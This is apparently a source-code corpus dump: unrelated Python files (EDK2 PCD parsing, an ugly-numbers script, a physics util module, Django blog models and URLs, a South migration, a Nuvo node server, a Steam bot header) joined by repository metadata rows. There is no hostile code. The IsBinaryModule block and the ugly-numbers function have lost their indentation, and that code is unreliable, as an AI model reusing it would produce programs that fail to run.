            self._PcdComments[TokenSpaceGuid, PcdCName] = Comments
        # resolve PCD type, value, datum info, etc. by getting its definition from package
        _GuidDict = self.Guids.copy()
        for PcdCName, TokenSpaceGuid in PcdList:
            PcdRealName = PcdCName
            Setting, LineNo = PcdDict[self._Arch, self.Platform, PcdCName, TokenSpaceGuid]
            if Setting is None:
                continue
            ValueList = AnalyzePcdData(Setting)
            DefaultValue = ValueList[0]
            Pcd = PcdClassObject(
                    PcdCName,
                    TokenSpaceGuid,
                    '',
                    '',
                    DefaultValue,
                    '',
                    '',
                    {},
                    False,
                    self.Guids[TokenSpaceGuid]
                    )
            if Type == MODEL_PCD_PATCHABLE_IN_MODULE and ValueList[1]:
                # Patch PCD: TokenSpace.PcdCName|Value|Offset
                Pcd.Offset = ValueList[1]
            # Mixed PCDs (same PCD used with several access types) are renamed
            # in the declaring package to carry a type suffix.
            if (PcdRealName, TokenSpaceGuid) in GlobalData.MixedPcd:
                for Package in self.Packages:
                    for key in Package.Pcds:
                        if (Package.Pcds[key].TokenCName, Package.Pcds[key].TokenSpaceGuidCName) == (PcdRealName, TokenSpaceGuid):
                            for item in GlobalData.MixedPcd[(PcdRealName, TokenSpaceGuid)]:
                                Pcd_Type = item[0].split('_')[-1]
                                if Pcd_Type == Package.Pcds[key].Type:
                                    Value = Package.Pcds[key]
                                    Value.TokenCName = Package.Pcds[key].TokenCName + '_' + Pcd_Type
                                    if len(key) == 2:
                                        newkey = (Value.TokenCName, key[1])
                                    elif len(key) == 3:
                                        newkey = (Value.TokenCName, key[1], key[2])
                                    del Package.Pcds[key]
                                    Package.Pcds[newkey] = Value
                                    break
                                else:
                                    pass
                        else:
                            pass
            # get necessary info from package declaring this PCD
            for Package in self.Packages:
                #
                # 'dynamic' in INF means its type is determined by platform;
                # if platform doesn't give its type, use 'lowest' one in the
                # following order, if any
                #
                # TAB_PCDS_FIXED_AT_BUILD, TAB_PCDS_PATCHABLE_IN_MODULE, TAB_PCDS_FEATURE_FLAG, TAB_PCDS_DYNAMIC, TAB_PCDS_DYNAMIC_EX
                #
                _GuidDict.update(Package.Guids)
                PcdType = self._PCD_TYPE_STRING_[Type]
                if Type == MODEL_PCD_DYNAMIC:
                    Pcd.Pending = True
                    for T in PCD_TYPE_LIST:
                        if (PcdRealName, TokenSpaceGuid) in GlobalData.MixedPcd:
                            for item in GlobalData.MixedPcd[(PcdRealName, TokenSpaceGuid)]:
                                if str(item[0]).endswith(T) and (item[0], item[1], T) in Package.Pcds:
                                    PcdType = T
                                    PcdCName = item[0]
                                    break
                                else:
                                    pass
                            break
                        else:
                            if (PcdRealName, TokenSpaceGuid, T) in Package.Pcds:
                                PcdType = T
                                break
                else:
                    Pcd.Pending = False
                    if (PcdRealName, TokenSpaceGuid) in GlobalData.MixedPcd:
                        for item in GlobalData.MixedPcd[(PcdRealName, TokenSpaceGuid)]:
                            Pcd_Type = item[0].split('_')[-1]
                            if Pcd_Type == PcdType:
                                PcdCName = item[0]
                                break
                            else:
                                pass
                    else:
                        pass
                if (PcdCName, TokenSpaceGuid, PcdType) in Package.Pcds:
                    PcdInPackage = Package.Pcds[PcdCName, TokenSpaceGuid, PcdType]
                    Pcd.Type = PcdType
                    Pcd.TokenValue = PcdInPackage.TokenValue
                    #
                    # Check whether the token value exist or not.
                    #
                    if Pcd.TokenValue is None or Pcd.TokenValue == "":
                        EdkLogger.error(
                                'build',
                                FORMAT_INVALID,
                                "No TokenValue for PCD [%s.%s] in [%s]!" % (TokenSpaceGuid, PcdRealName, str(Package)),
                                File=self.MetaFile, Line=LineNo,
                                ExtraData=None
                                )
                    #
                    # Check hexadecimal token value length and format.
                    #
                    # NOTE(review): the class [x|X] also matches a literal '|';
                    # harmless here because values reaching the match already
                    # start with 0x/0X, but likely unintended.
                    ReIsValidPcdTokenValue = re.compile(r"^[0][x|X][0]*[0-9a-fA-F]{1,8}$", re.DOTALL)
                    if Pcd.TokenValue.startswith("0x") or Pcd.TokenValue.startswith("0X"):
                        if ReIsValidPcdTokenValue.match(Pcd.TokenValue) is None:
                            EdkLogger.error(
                                    'build',
                                    FORMAT_INVALID,
                                    "The format of TokenValue [%s] of PCD [%s.%s] in [%s] is invalid:" % (Pcd.TokenValue, TokenSpaceGuid, PcdRealName, str(Package)),
                                    File=self.MetaFile, Line=LineNo,
                                    ExtraData=None
                                    )
                    #
                    # Check decimal token value length and format.
                    #
                    else:
                        try:
                            TokenValueInt = int (Pcd.TokenValue, 10)
                            if (TokenValueInt < 0 or TokenValueInt > 4294967295):
                                EdkLogger.error(
                                        'build',
                                        FORMAT_INVALID,
                                        "The format of TokenValue [%s] of PCD [%s.%s] in [%s] is invalid, as a decimal it should between: 0 - 4294967295!" % (Pcd.TokenValue, TokenSpaceGuid, PcdRealName, str(Package)),
                                        File=self.MetaFile, Line=LineNo,
                                        ExtraData=None
                                        )
                        except:
                            # NOTE(review): bare except also swallows
                            # KeyboardInterrupt; narrowing to ValueError would
                            # be safer -- left as-is here.
                            EdkLogger.error(
                                    'build',
                                    FORMAT_INVALID,
                                    "The format of TokenValue [%s] of PCD [%s.%s] in [%s] is invalid, it should be hexadecimal or decimal!" % (Pcd.TokenValue, TokenSpaceGuid, PcdRealName, str(Package)),
                                    File=self.MetaFile, Line=LineNo,
                                    ExtraData=None
                                    )
                    Pcd.DatumType = PcdInPackage.DatumType
                    Pcd.MaxDatumSize = PcdInPackage.MaxDatumSize
                    Pcd.InfDefaultValue = Pcd.DefaultValue
                    if not Pcd.DefaultValue:
                        Pcd.DefaultValue = PcdInPackage.DefaultValue
                    else:
                        try:
                            Pcd.DefaultValue = ValueExpressionEx(Pcd.DefaultValue, Pcd.DatumType, _GuidDict)(True)
                        except BadExpression as Value:
                            EdkLogger.error('Parser', FORMAT_INVALID, 'PCD [%s.%s] Value "%s", %s' %(TokenSpaceGuid, PcdRealName, Pcd.DefaultValue, Value),
                                            File=self.MetaFile, Line=LineNo)
                    break
                else:
                    # No package declares this PCD at all: fatal.
                    EdkLogger.error(
                                'build',
                                FORMAT_INVALID,
                                "PCD [%s.%s] in [%s] is not found in dependent packages:" % (TokenSpaceGuid, PcdRealName, self.MetaFile),
                                File=self.MetaFile, Line=LineNo,
                                ExtraData="\t%s" % '\n\t'.join(str(P) for P in self.Packages)
                                )
            Pcds[PcdCName, TokenSpaceGuid] = Pcd
        return Pcds
## check whether current module is binary module
@property
def IsBinaryModule(self):
if (self.Binaries and not self.Sources) or GlobalData.gIgnoreSource:
return True
return False
def ExtendCopyDictionaryLists(CopyToDict, CopyFromDict):
    """Extend each list in CopyToDict with the same-keyed list from CopyFromDict.

    Every key of CopyFromDict must already map to a list in CopyToDict
    (or CopyToDict must be a defaultdict(list)).
    """
    for key, values in CopyFromDict.items():
        CopyToDict[key].extend(values)
| [
"maurice.ma@intel.com"
] | maurice.ma@intel.com |
cbc29434aacb4197e0659ac27759672a36ea6776 | 6579f8ce0a7d27af6fc87d72d012a486bd889eea | /uglynumbers.py | ef4e1efe8e9e8d2cf57f596c76f682f22a074bff | [] | no_license | ankithmjain/algorithms | bbd94be6828a6e520782afd302b4faac117df1ca | fe439df150fb3830ed8f0bd3d2456dacca933663 | refs/heads/master | 2020-03-27T14:47:18.015750 | 2018-08-28T16:47:28 | 2018-08-28T16:47:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,203 | py | def getNthUglyNo(n):
ugly = [0] * n # To store ugly numbers
# 1 is the first ugly number
ugly[0] = 1
# i2, i3, i5 will indicate indices for 2,3,5 respectively
i2 = i3 = i5 = 0
# set initial multiple value
next_multiple_of_2 = 2
next_multiple_of_3 = 3
next_multiple_of_5 = 5
# start loop to find value from ugly[1] to ugly[n]
for l in range(1, n):
# choose the min value of all available multiples
ugly[l] = min(next_multiple_of_2, next_multiple_of_3, next_multiple_of_5)
print ugly, i2, i3, i5
print l, next_multiple_of_2, next_multiple_of_3, next_multiple_of_5
# increment the value of index accordingly
if ugly[l] == next_multiple_of_2:
i2 += 1
next_multiple_of_2 = ugly[i2] * 2
if ugly[l] == next_multiple_of_3:
i3 += 1
next_multiple_of_3 = ugly[i3] * 3
if ugly[l] == next_multiple_of_5:
i5 += 1
next_multiple_of_5 = ugly[i5] * 5
# return ugly[n] value
return ugly
def main():
    """Demo driver: print the first 20 ugly numbers.

    Uses function-call print syntax so the script runs on both Python 2
    and Python 3 (the original `print expr` statement is Python-2-only).
    """
    n = 20
    print(getNthUglyNo(n))
# Run the demo only when executed as a script (not on import).
if __name__ == '__main__':
    main()
| [
"noreply@github.com"
] | ankithmjain.noreply@github.com |
beb8f00ca4461f449d82782c0683a196f2828a6a | 073c7ae30b0fbdadb3f60bdcf37940a496a3b2eb | /python/util.py | f88ba65b52323c39f073a193f6750bc183bd56c0 | [
"MIT"
] | permissive | cms-ttbarAC/CyMiniAna | 0e2a771473cf23eb931aa0ae7a015a5165f927b9 | 405b1ac6639f8a93297e847180b5a6ab58f9a06c | refs/heads/master | 2021-05-15T22:57:36.033299 | 2018-07-31T20:39:11 | 2018-07-31T20:39:11 | 106,871,363 | 0 | 1 | MIT | 2018-07-31T20:39:12 | 2017-10-13T20:41:28 | C++ | UTF-8 | Python | false | false | 5,834 | py | """
Created: --
Last Updated: 2 March 2018
Dan Marley
daniel.edison.marley@cernSPAMNOT.ch
Texas A&M University
-----
File that holds any and all misc. functions
to be called from other python scripts.
(All information in one file => one location to update!)
"""
import ROOT
import numpy as np
class Sample(object):
    """Per-sample metadata container (cross-section, weights, dataset names)."""

    def __init__(self):
        """Initialize every field to a neutral default."""
        self.xsection = 1          # sample cross-section
        self.sumOfWeights = 1      # sum of generated event weights
        self.nevents = 1           # number of events
        self.sampleType = ""       # sample category label
        self.primaryDataset = ""   # primary dataset name
def getHistSeparation( S, B ):
    """Return the separation 0.5 * sum (s-b)^2/(s+b) between TH1 S and B.

    S and B must share the same binning; each histogram is normalized to
    its own sum of weights before comparing bin contents.
    Copied from : https://root.cern.ch/doc/master/MethodBase_8cxx_source.html#l02740
    """
    separation = 0
    nbins = S.GetNbinsX()
    nS = S.GetSumOfWeights()
    nB = B.GetSumOfWeights()
    # Removed: unused locals (xaxis) and loop variable shadowing builtin 'bin'.
    for i in range(nbins):
        s = S.GetBinContent( i+1 )/nS  # ROOT bins are 1-indexed
        b = B.GetBinContent( i+1 )/nB
        if (s+b) > 0: separation += (s - b)*(s - b)/(s + b)
    separation *= 0.5
    return separation
def GetSeparation2D( S, B ):
    """Return the separation 0.5 * sum (s-b)^2/(s+b) between TH2 S and B.

    S and B must share the same 2D binning; each histogram is normalized
    to its own integral before comparing bin contents.
    """
    separation = 0
    nbinsx = S.GetNbinsX()
    nbinsy = S.GetNbinsY()
    integral_s = S.Integral()
    integral_b = B.Integral()
    # Removed: unused locals (xaxis, yaxis).
    for x in range(nbinsx):
        for y in range(nbinsy):
            s = S.GetBinContent( x+1,y+1 )/integral_s  # ROOT bins are 1-indexed
            b = B.GetBinContent( x+1,y+1 )/integral_b
            if (s+b) > 0: separation += (s - b)*(s - b)/(s + b)
    separation *= 0.5
    return separation
def getSeparation(sig,bkg):
    """Return 0.5 * sum (s-b)^2/(s+b) for two binned distributions.

    Each input is normalized to its own total before comparing bins.
    """
    nS = 1.0*np.sum(sig)
    nB = 1.0*np.sum(bkg)
    separation = 0
    for sig_bin, bkg_bin in zip(sig, bkg):
        s = sig_bin/nS
        b = bkg_bin/nB
        # Skip bins that are empty in both distributions (avoid 0/0).
        if (s+b) > 0:
            separation += (s - b)*(s - b)/(s + b)
    return 0.5*separation
def read_config(filename,separation=" "):
    """
    Read configuration file with data stored like:
       'config option'
    And the 'config' and 'option' are separated by a character, e.g., " "

    Returns a dict mapping each config name to its option string.
    """
    cfg = {}
    for line in file2list(filename):
        # Split only on the FIRST separator so option values may themselves
        # contain the separator character; a line without a separator maps
        # to '' instead of raising IndexError.
        key, _, value = line.partition(separation)
        cfg[key] = value
    return cfg
def extract(str_value, start_='{', stop_='}'):
    """Extract a string between two symbols, e.g., parentheses."""
    begin = str_value.index(start_) + 1
    end = str_value.index(stop_)
    return str_value[begin:end]
def to_csv(filename,data):
    """Write each string in *data* verbatim to *filename* ('.csv' appended if missing)."""
    if not filename.endswith(".csv"): filename += ".csv"
    # Context manager guarantees the file handle is closed even on error
    # (the original left the handle open if a write raised).
    with open(filename, "w") as f:
        for d in data:
            f.write(d)
    return
def file2list(filename):
    """Load text file and dump contents into a list.

    Trailing newlines are stripped; lines starting with '#' are skipped.
    """
    # 'with' closes the handle (the original leaked an open file object).
    with open(filename, 'r') as f:
        return [i.rstrip('\n') for i in f if not i.startswith("#")]
def str2bool(param):
    """Convert a string to a boolean (True only for 'true', 'True', or '1')."""
    return param in ('true', 'True', '1')
def getPrimaryDataset(root_file):
    """Return the primary-dataset name stored in 'tree/metadata', or None.

    Any failure (missing tree, missing branch, non-ROOT object) yields None;
    callers treat None as "unknown dataset".
    """
    try:
        md = root_file.Get("tree/metadata")
        md.GetEntry(0)
        return str(md.primaryDataset)
    except Exception:
        # Narrowed from a bare 'except:' so KeyboardInterrupt/SystemExit
        # still propagate.
        return None
def loadMetadata(file):
    """Parse a metadata file into {primaryDataset: Sample}.

    Each non-comment line is 'sampleType primaryDataset ...'.  Fixed
    collision-data entries (data / SingleMuon / SingleElectron) are always
    appended, overriding any same-named file entries.
    """
    samples = {}
    for line in file2list(file):
        if line.startswith("#"):
            continue
        fields = line.split(" ")
        entry = Sample()
        entry.sampleType = fields[0]
        entry.primaryDataset = fields[1]
        samples[fields[1]] = entry
    # Hard-coded collision-data entries.
    for sample_type, dataset in (('data', 'data'),
                                 ('mujets', 'SingleMuon'),
                                 ('ejets', 'SingleElectron')):
        entry = Sample()
        entry.sampleType = sample_type
        entry.primaryDataset = dataset
        samples[dataset] = entry
    return samples
class VERBOSE(object):
    """Leveled console printer (DEBUG < INFO < WARNING < ERROR)."""

    def __init__(self):
        # Ordered mapping of level names to integers used for comparisons.
        self.verboseMap = {"DEBUG": 0, "INFO": 1, "WARNING": 2, "ERROR": 3}
        self.level = "WARNING"   # active threshold (name)
        self.level_int = 2       # active threshold (integer)

    def initialize(self):
        """Recompute the integer threshold from the current level name."""
        self.level_int = self.verboseMap[self.level]

    def level_value(self):
        """Return the current integer threshold."""
        return self.level_int

    def DEBUG(self, message):
        """Debug level - most verbose."""
        self.verbose("DEBUG", message)

    def INFO(self, message):
        """Info level - standard output."""
        self.verbose("INFO", message)

    def WARNING(self, message):
        """Warning level - something seems wrong but execution can continue."""
        self.verbose("WARNING", message)

    def ERROR(self, message):
        """Error level - something is wrong."""
        self.verbose("ERROR", message)

    def compare(self, level1, level2=None):
        """Return True when level1 is at or above level2 (or the active threshold)."""
        threshold = self.level_int if level2 is None else self.verboseMap[level2]
        return self.verboseMap[level1] >= threshold

    def verbose(self, level, message):
        """Print the message when its level passes the active threshold."""
        if self.compare(level):
            print(" {0} :: {1}".format(level, message))

    def HELP(self):
        """Print usage instructions."""
        print(" CyMiniAna Deep Learning ")
        print(" To run, execute the command: ")
        print(" $ python python/runDeepLearning.py <config> ")
        print(" where <config> is a text file that outlines the configuration ")
| [
"daniel.edison.marley@cern.ch"
] | daniel.edison.marley@cern.ch |
3637fd3e296a3f5f82d57cb07e58f56f4f0e112c | 04f3301300d5db73b311b329fa496ee3a93af1e1 | /blog_tech/blog/models.py | 03df17699e66f7164ac13260201e8b2a3c6de33f | [] | no_license | verma-varsha/blog_tech | e7f8054086fb07584ddd74f82174f11c06f654e6 | 4a054e720a2f69123ca7892f51128c5ccd106af7 | refs/heads/master | 2020-04-06T06:55:07.134852 | 2016-09-05T11:44:20 | 2016-09-05T11:44:20 | 65,595,156 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,327 | py | from __future__ import unicode_literals
from django.template.defaultfilters import slugify
from django.db import models
# Create your models here.
class Tag(models.Model):
    """A label attachable to many posts (many-to-many via Post.tag)."""
    tag_title=models.CharField(max_length=100)
    slug=models.SlugField(null=True)
    def save(self, *args, **kwargs):
        # Regenerate the slug from the title on every save.
        self.slug=slugify(self.tag_title)
        super(Tag, self).save(*args, **kwargs)
    def __unicode__(self):
        # Python-2 string representation (shown e.g. in the Django admin).
        return self.tag_title
class Post(models.Model):
    """A blog post; its slug is auto-derived from the title on save."""
    post_title= models.CharField(max_length=150)
    post_content= models.TextField()
    # Short preview text for list views.
    post_content_short= models.CharField(max_length=100, null=True)
    # Set once at creation (auto_now_add), never updated afterwards.
    timestamp=models.DateTimeField(auto_now=False, auto_now_add=True)
    author= models.CharField(max_length=100)
    tag=models.ManyToManyField(Tag)
    slug=models.SlugField(null=True)
    image=models.FileField(null=True, blank=True)
    def save(self, *args, **kwargs):
        # Regenerate the slug from the title on every save.
        self.slug=slugify(self.post_title)
        super(Post, self).save(*args, **kwargs)
    def __unicode__(self):
        # Python-2 string representation.
        return self.post_title
class CommentUser(models.Model):
    """A visitor comment attached to a Post."""
    user_name= models.CharField(max_length=150)
    user_email= models.EmailField(max_length=254)
    user_comment= models.TextField()
    # The post this comment belongs to (nullable foreign key).
    user_post=models.ForeignKey(Post, null=True)
    def __unicode__(self):
        # Python-2 string representation.
        return self.user_comment
| [
"varsha.verma.eee15@itbhu.ac.in"
] | varsha.verma.eee15@itbhu.ac.in |
7b144d09152b90fe9b271efb75147d60dcc5fff4 | 2e5bf9b0c6f83a63a7048b32ca544779dbe9c2a7 | /nuvo.py | 7bf80a9b2ebd20f5f78c339d57ee3ccf634440a1 | [] | no_license | stmrocket/nuvo-polyglot | 01ec9a8fe87ea802d7e017453b9d08d3f1064242 | 8366b0453694c72dc755fbffafdb65c8b8bee940 | refs/heads/master | 2021-06-13T22:39:04.597918 | 2017-05-02T02:17:03 | 2017-05-02T02:17:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,181 | py | from polyglot.nodeserver_api import SimpleNodeServer, PolyglotConnector
from nuvo_nodes import NuvoMain
VERSION = "0.0.1"
class NuvoNodeServer(SimpleNodeServer):
    """ Nuvo Node Server """
    # Zone list shared at class level.
    zones = []
    def setup(self):
        """Build the main controller node and its zones, then persist config."""
        # NOTE(review): super(SimpleNodeServer, self) skips
        # SimpleNodeServer.setup and dispatches to ITS base class; the usual
        # idiom is super(NuvoNodeServer, self) -- confirm this is intentional.
        super(SimpleNodeServer, self).setup()
        manifest = self.config.get('manifest',{})
        self.controller = NuvoMain(self, 'nuvocontroller', 'Nuvo NS', manifest, self.poly.nodeserver_config)
        self.controller.add_zones()
        self.poly.logger.info("FROM Poly ISYVER: " + self.poly.isyver)
        self.update_config()
    def poll(self):
        # Short-poll hook: nothing to do each cycle.
        pass
    def long_poll(self):
        # Future stuff
        pass
def main():
    """Wire up the Polyglot connection, build the node server, and run it."""
    connection = PolyglotConnector()
    # Poll timers are raised from the defaults; polling once per second
    # is unnecessary for this device.
    server = NuvoNodeServer(connection, shortpoll=30, longpoll=300)
    connection.connect()
    connection.wait_for_config()
    connection.logger.info(
        "Nuvo Interface version " + VERSION + " created. Initiating setup.")
    server.setup()
    connection.logger.info("Setup completed. Running Server.")
    server.run()


if __name__ == "__main__":
    main()
| [
"brett.hale@ticketmaster.com"
] | brett.hale@ticketmaster.com |
cd92ecd38dfe509e767b4977f1112c79d390744f | 0bfe6df147ffa74b6d2800391981273149502684 | /visionary/visionary/migrations/0002_add_model_Mindmap.py | 5ab5e8e1132a90e50d890cd2eef82b5aab730db0 | [] | no_license | lumenwrites/digitalMind_django | 829c95eca4720c2bbe71d14bdcce64e9eccd3752 | 0968f0006cf450f2796736cd604c5f6cba82147f | refs/heads/master | 2021-05-27T14:54:35.108215 | 2014-09-11T09:48:58 | 2014-09-11T09:48:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,903 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: adds the ``visionary.Mindmap`` model."""

    def forwards(self, orm):
        """Apply: create the visionary_mindmap table and signal creation."""
        # Adding model 'Mindmap'
        db.create_table('visionary_mindmap', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
            ('name', self.gf('django.db.models.fields.CharField')(max_length=100, unique=True)),
            ('slug', self.gf('django.db.models.fields.SlugField')(max_length=50)),
            ('data', self.gf('django.db.models.fields.TextField')()),
        ))
        db.send_create_signal('visionary', ['Mindmap'])

    def backwards(self, orm):
        """Revert: drop the visionary_mindmap table."""
        # Deleting model 'Mindmap'
        db.delete_table('visionary_mindmap')

    # Frozen ORM snapshot generated by South; do not edit by hand.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'max_length': '30', 'unique': 'True'})
        },
        'contenttypes.contenttype': {
            'Meta': {'db_table': "'django_content_type'", 'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType'},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'visionary.mindmap': {
            'Meta': {'object_name': 'Mindmap'},
            'data': ('django.db.models.fields.TextField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'unique': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        },
        'visionary.state': {
            'Meta': {'object_name': 'State'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'state': ('django.db.models.fields.TextField', [], {}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        }
    }

    complete_apps = ['visionary']
"raymestalez@gmail.com"
] | raymestalez@gmail.com |
d9a8d10ec7e7bd0b7885e0cffc746e6ecfe83e82 | 0e4c89041021eea295a5a9a848e330dbbeb80d9f | /server/phpcafe/urls.py | eb9da4da1ba7791219f8c5b29c883bcdc0baa54d | [] | no_license | emmanuelduv/pycafe | 2611780d960b7262f62f3d4dd023d44e9f645aae | 0eb2eadeb27a9a8bc9e2b6e9ec1a40d7b9bfb33c | refs/heads/master | 2021-01-01T05:50:39.028548 | 2013-04-07T20:13:04 | 2013-04-07T20:13:04 | 9,247,778 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,691 | py | from django.conf.urls import patterns, include, url
from django.views.generic import DetailView, ListView
from cyber.models import Vendeur, Utilisateur
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
# URL routes for the cyber-cafe app (French domain terms: utilisateur=user,
# vendeur=seller, vente=sale, ticket=prepaid ticket).  Most list views take
# an optional "page<N>/" suffix for pagination.
urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'phpcafe.views.home', name='home'),
    # url(r'^phpcafe/', include('phpcafe.foo.urls')),

    # Uncomment the admin/doc line below to enable admin documentation:
    # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),

    # Home, admin and authentication.
    url(r'^$', 'cyber.views.accueil', name='accueil'),
    url(r'^admin/', include(admin.site.urls)),
    url(r'^login$', 'cyber.views.login', name='login'),
    url(r'^logout$', 'cyber.views.logout', name='logout'),
    # Walk-in computer sessions.
    url(r'^session_start$', 'cyber.views.session_start'),
    url(r'^session_continue$', 'cyber.views.session_continue'),
    url(r'^sessions/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listSessions', name='listSessions'),
    # Prepaid tickets and ticket-based sessions/sales.
    url(r'^ticket/creer$', 'cyber.views.newTicket', name='newTicket'),
    url(r'^ticket/chercher/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listTickets', name='listTickets'),
    url(r'^ticket/(?P<pk>\d+)/edit', 'cyber.views.editTicket', name='editTicket'),
    url(r'^ticket/session_start$', 'cyber.views.ticket_session_start'),
    url(r'^ticket/session_continue$', 'cyber.views.ticket_session_continue'),
    url(r'^ticket/session_close$', 'cyber.views.ticket_session_close'),
    url(r'^ticket/(?P<ticket_id>\d+)/sessions/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listSessionsTkt', name='listSessionsTkt'),
    url(r'^ticket/(?P<ticket_id>\d+)/ventes/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listVentesTkt', name='listVentesTkt'),
    url(r'^ticket/ventes/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listTktVentes', name='listTktVentes'),
    url(r'^tickets/sessions/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listTktSessions', name='listTktSessions'),
    # Users (utilisateurs).
    url(r'^utilisateur/creer$', 'cyber.views.newUtilisateur', name='newUtilisateur'),
    # url(r'^utilisateur/(?P<pk>\d+)/modifier$', 'cyber.views.editUtilisateur'),
    url(r'^utilisateur/(?P<pk>\d+)$', DetailView.as_view(model=Utilisateur,
        template_name='cyber/utilisateur.html'), name='utilisateurList'),
    url(r'^utilisateurs/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listUtilisateurs', name='listUtilisateurs'),
    url(r'^utilisateurs/(?P<utilisateur_id>\d+)/tickets/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listUtilisateurTkt', name='listUtilisateurTkt'),
    # Sales and sellers (ventes / vendeurs).
    url(r'^ventes/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listVentes', name='listVentes'),
    url(r'^vendeurs/$', ListView.as_view(model=Vendeur, queryset=Vendeur.objects.order_by('-id'),
        template_name='cyber/vendeur_list.html'), name='vendeurList'),
    url(r'^vendeur/(?P<pk>\d+)$', DetailView.as_view(model=Vendeur,
        template_name='cyber/vendeur_detail.html'), name='vendeurDetail'),
    url(r'^vendeur/(?P<vendeur_id>\d+)/ventes/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listVendeurVentes', name='listVendeurVentes'),
    url(r'^vendeur/(?P<vendeur_id>\d+)/ventesTkt/(page(?P<page>[0-9]+)/)?$', 'cyber.views.listVendeurVentesTkt', name='listVendeurVentesTkt'),
    url(r'^utilisateur/(?P<utilisateur_id>\d+)/connexions/(page(?P<page>[0-9]+)/)?$',
        'cyber.views.listUtilisateurConnexions', name='listUtilisateurConnexions'),
    url(r'^vendeur/(?P<pk>\d+)/modifier$', 'cyber.views.editVendeur', name='editVendeur'),
    url(r'^vendeur/creer$', 'cyber.views.newVendeur', name='newVendeur'),
    url(r'^vendre$', 'cyber.views.Vendre', name='Vendre'),
    # url(r'^vendeur/(?P<pk>\d+)/modifier/$', ''),
)
# Serve static files in development.
urlpatterns += staticfiles_urlpatterns()
"dede@station3.(none)"
] | dede@station3.(none) |
0c724cb818b956ff13f750d4e53c877c0ac027c7 | 2668b2b72dbd510870c86b5c5d82cbae0371f4d9 | /steam_ops.py | 2cdaf24886cf3c069a0007ae0a5ade7348f1782c | [] | no_license | korrnev/ShorelineB | 1669353eaf5cb9829997206a0f3957fb6550f7f2 | 38ca6ad2236af02e3c55928af86a2cdde7f3c627 | refs/heads/master | 2023-05-14T20:07:08.588958 | 2020-04-15T07:49:50 | 2020-04-15T07:49:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,040 | py | # Core
import json
import sys
import os
import pickle
# The module, that helps to interact with the steam API
import steam # Steam WebAPI
from steampy.client import SteamClient, Asset # Steam Trades API
from steampy.utils import GameOptions
import db
import requests
USER_DATA_FOLDER = 'userdata' # Folder, where store accounts secrets and saved sessions
GAME = GameOptions.CS # This bot made only for market.csgo.com
